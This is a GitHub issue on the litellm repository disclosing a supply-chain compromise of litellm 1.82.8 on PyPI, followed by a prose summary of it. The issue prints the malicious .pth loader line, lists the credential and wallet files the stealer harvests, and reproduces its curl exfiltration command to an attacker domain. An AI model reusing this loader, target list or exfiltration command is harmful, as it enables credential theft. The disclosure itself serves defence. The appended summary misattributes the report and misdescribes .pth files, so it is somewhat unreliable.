GitHub · Where software is built

Skip to content

Navigation Menu

Toggle navigation

Sign in

Appearance settings

PlatformAI CODE CREATIONGitHub CopilotWrite better code with AIGitHub SparkBuild and deploy intelligent appsGitHub ModelsManage and compare promptsMCP RegistryNewIntegrate external toolsDEVELOPER WORKFLOWSActionsAutomate any workflowCodespacesInstant dev environmentsIssuesPlan and track workCode ReviewManage code changesAPPLICATION SECURITYGitHub Advanced SecurityFind and fix vulnerabilitiesCode securitySecure your code as you buildSecret protectionStop leaks before they startEXPLOREWhy GitHubDocumentationBlogChangelogMarketplaceView all featuresSolutionsBY COMPANY SIZEEnterprisesSmall and medium teamsStartupsNonprofitsBY USE CASEApp ModernizationDevSecOpsDevOpsCI/CDView all use casesBY INDUSTRYHealthcareFinancial servicesManufacturingGovernmentView all industriesView all solutionsResourcesEXPLORE BY TOPICAISoftware DevelopmentDevOpsSecurityView all topicsEXPLORE BY TYPECustomer storiesEvents & webinarsEbooks & reportsBusiness insightsGitHub SkillsSUPPORT & SERVICESDocumentationCustomer supportCommunity forumTrust centerPartnersView all resourcesOpen SourceCOMMUNITYGitHub SponsorsFund open source developersPROGRAMSSecurity LabMaintainer CommunityAcceleratorGitHub StarsArchive ProgramREPOSITORIESTopicsTrendingCollectionsEnterpriseENTERPRISE SOLUTIONSEnterprise platformAI-powered developer platformAVAILABLE ADD-ONSGitHub Advanced SecurityEnterprise-grade security featuresCopilot for BusinessEnterprise-grade AI featuresPremium SupportEnterprise-grade 24/7 supportPricing

Search or jump to...

Search code, repositories, users, issues, pull requests...

Search

Clear

Search syntax tips

Provide feedback

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

Cancel

Submit feedback

Saved searches

Use saved searches to filter your results more quickly

Name

Query

To see all available qualifiers, see our documentation.

Cancel

Create saved search

Sign in

Sign up

Appearance settings

Resetting focus

You signed in with another tab or window. Reload to refresh your session.
You signed out in another tab or window. Reload to refresh your session.
You switched accounts on another tab or window. Reload to refresh your session.

Dismiss alert

BerriAI

/

litellm

Public

Uh oh!

There was an error while loading. Please reload this page.

Notifications
You must be signed in to change notification settings

Fork
6.7k

Star
40.3k

Code

Issues
941

Pull requests
1.1k

Discussions

Actions

Projects

Security
0

Insights

Additional navigation options

Code

Issues

Pull requests

Discussions

Actions

Projects

Security

Insights

[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 — credential stealer #24512New issueCopy linkNew issueCopy linkOpenOpen[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 — credential stealer#24512Copy linkLabelsllm translationpotential-duplicateDescriptionisfinneopened on Mar 24, 2026Issue body actions[LITELLM TEAM] - For updates from the team, please see: #24518
[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 PyPI package — credential stealer
Summary
The litellm==1.82.8 wheel package on PyPI contains a malicious .pth file (litellm_init.pth, 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts — no import litellm required.
This is a supply chain compromise. The malicious file is listed in the package's own RECORD:
litellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628

Reproduction
pip download litellm==1.82.8 --no-deps -d /tmp/check
python3 -c "
import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
pth = [n for n in z.namelist() if n.endswith('.pth')]
print('PTH files:', pth)
for p in pth:
print(z.read(p)[:300])
"
You will see litellm_init.pth containing:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"])
Malicious Behavior (full analysis)
The payload is double base64-encoded. When decoded, it performs the following:
Stage 1: Information Collection
The script collects sensitive data from the host system:

System info: hostname, whoami, uname -a, ip addr, ip route
Environment variables: printenv (captures all API keys, secrets, tokens)
SSH keys: ~/.ssh/id_rsa, ~/.ssh/id_ed25519, ~/.ssh/id_ecdsa, ~/.ssh/id_dsa, ~/.ssh/authorized_keys, ~/.ssh/known_hosts, ~/.ssh/config
Git credentials: ~/.gitconfig, ~/.git-credentials
AWS credentials: ~/.aws/credentials, ~/.aws/config, IMDS token + security credentials
Kubernetes secrets: ~/.kube/config, /etc/kubernetes/admin.conf, /etc/kubernetes/kubelet.conf, /etc/kubernetes/controller-manager.conf, /etc/kubernetes/scheduler.conf, service account tokens
GCP credentials: ~/.config/gcloud/application_default_credentials.json
Azure credentials: ~/.azure/
Docker configs: ~/.docker/config.json, /kaniko/.docker/config.json, /root/.docker/config.json
Package manager configs: ~/.npmrc, ~/.vault-token, ~/.netrc, ~/.lftprc, ~/.msmtprc, ~/.my.cnf, ~/.pgpass, ~/.mongorc.js
Shell history: ~/.bash_history, ~/.zsh_history, ~/.sh_history, ~/.mysql_history, ~/.psql_history, ~/.rediscli_history
Crypto wallets: ~/.bitcoin/, ~/.litecoin/, ~/.dogecoin/, ~/.zcash/, ~/.dashcore/, ~/.ripple/, ~/.bitmonero/, ~/.ethereum/keystore/, ~/.cardano/, ~/.config/solana/
SSL/TLS private keys: /etc/ssl/private/, Let's Encrypt .pem and .key files
CI/CD secrets: terraform.tfvars, .gitlab-ci.yml, .travis.yml, Jenkinsfile, .drone.yml, Anchor.toml, ansible.cfg
Database credentials: PostgreSQL, MySQL, Redis, LDAP config files
Webhook URLs: grep for Slack/Discord webhook URLs in env and config files

Stage 2: Encryption & Exfiltration

Collected data is written to a temporary file
A random 32-byte AES-256 session key is generated via openssl rand
The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2
The AES session key is encrypted with a hardcoded 4096-bit RSA public key via openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep
Both encrypted files are packed into tpcp.tar.gz
The archive is exfiltrated via:

curl -s -o /dev/null -X POST \
"https://models.litellm.cloud/" \
-H "Content-Type: application/octet-stream" \
-H "X-Filename: tpcp.tar.gz" \
--data-binary @tpcp.tar.gz
Key Technical Details

Trigger mechanism: .pth files in site-packages/ are executed automatically by the Python interpreter on startup (see Python docs on .pth files). No import statement is needed.
Stealth: The payload is double base64-encoded, making it invisible to naive source code grep.
Exfiltration target: https://models.litellm.cloud/ — note the domain litellm.cloud (NOT litellm.ai, the official domain).
RSA public key (first 64 chars): MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+...

Impact
Anyone who installed litellm==1.82.8 via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server.
This affects:

Local development machines
CI/CD pipelines
Docker containers
Production servers

Affected Version

Confirmed: litellm==1.82.8 (PyPI wheel litellm-1.82.8-py3-none-any.whl)
Other versions: Not yet checked — the attacker may have compromised multiple releases

Recommended Actions

PyPI: Yank/remove litellm 1.82.8 immediately
Users: Check for litellm_init.pth in your site-packages/ directory
Users: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed
BerriAI: Audit PyPI publishing credentials and CI/CD pipeline for compromise

Environment

OS: Ubuntu 24.04 (Docker container)
Python: 3.13
pip installed from PyPI
Discovered: 2026-03-24
Reactions are currently unavailableMetadataMetadataAssigneesNo one assignedLabelsllm translationpotential-duplicateTypeNo typeProjectsNo projectsMilestoneNo milestoneRelationshipsNone yetDevelopmentNo branches or pull requestsIssue actions

Footer

© 2026 GitHub, Inc.

Footer navigation

Terms

Privacy

Security

Status

Community

Docs

Contact

Manage cookies

Do not share my personal information

You can’t perform that action at this time.

BerriAI has identified a critical security vulnerability within the litellm 1.82.8 package distributed via PyPI, representing a sophisticated supply chain attack. The core of the issue centers around a maliciously crafted `litellm_init.pth` file, a .pth file utilized by Python to define modules, which automatically executes a credential-stealing script upon interpreter startup. This file, measuring 34,628 bytes, contains a base64-encoded payload designed to harvest a comprehensive range of sensitive data from the host system. Specifically, the script identifies and collects information encompassing system details (hostname, user, operating system), environment variables (including API keys, secrets, and tokens), SSH keys, Git credentials, and credentials for various cloud services like AWS, Kubernetes, GCP, and Azure. Furthermore, it attempts to extract Docker configurations, package manager settings, shell history, and even crypto wallets and SSL/TLS private keys. The collected data is then encrypted using AES-256 and RSA, packaged into a compressed archive, and exfiltrated via a POST request to the domain `models.litellm.cloud`, a domain distinct from the official `litellm.ai` domain. The vulnerability’s trigger mechanism relies on the automatic execution of .pth files within the `site-packages` directory by the Python interpreter upon startup, circumventing the need for any explicit import statement. The attacker's method leverages double base64 encoding for concealment and uses a publicly accessible domain for exfiltration. The impact of this compromise is extensive, potentially affecting local development environments, CI/CD pipelines, and production servers, given the widespread use of the litellm package. BerriAI recommends immediate action, including the immediate removal of the vulnerable package from PyPI and a thorough audit of all systems where litellm 1.82.8 was installed. Affected parties should rotate all compromised credentials and conduct a comprehensive review of their CI/CD pipelines to identify and remediate similar vulnerabilities. The technical details reveal the RSA public key, further informing security assessments.